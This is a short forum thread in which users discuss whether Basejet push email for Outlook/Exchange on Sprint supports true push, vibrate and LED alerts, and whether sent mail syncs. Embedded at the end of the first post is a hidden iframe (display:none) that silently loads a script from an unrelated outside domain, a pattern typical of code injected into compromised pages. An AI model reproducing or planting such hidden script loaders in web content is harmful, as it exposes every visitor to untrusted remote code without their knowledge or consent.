+ Reply to Thread

Thread: basejet

basejet

Does anybody use this? I'm just wondering, with Outlook/Exchange Server and Sprint service:[list=1][*]Is it true push?[*]If true push, can you set the alert to vibrate?[*]If true push, will it light the red LED as alert?[/list=1]<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yes and more

Is it true push? Yes

If true push, can you set the alert to vibrate? Yes

If true push, will it light the red LED as alert? Yes

I just got an email from these guys about their new release. They have added both vibrate and LED to their latest release (push was already there). It will also play the sound that is selected in the prefs for new messages.

Very nice!

Just a question...

will e-mails sent from your PDA show up in the Sent folder of Outlook (or whatever e-mail app you're using)?

I tried Basejet on my Treo 300 and a Domino server and I didn't get any sent mails in my Notes Sent folder, but maybe it was just me (or the Treo or Domino).

Thanks.

=NLK=

KC Mike - obsessively converged mb5451's Avatar
    Hey Rocky - would you please educate me on what this thread is referring to? I'm using Outllook 2003 - with the OMA (Outlook Mobile Agent). It works from the i500, but is a pain. What is Basejet?
    KC Mike - Palm/PPC/ ..............

Blackberry Curve 8310 - Google Maps, Beyond411, Splashid, 2GB micro-SD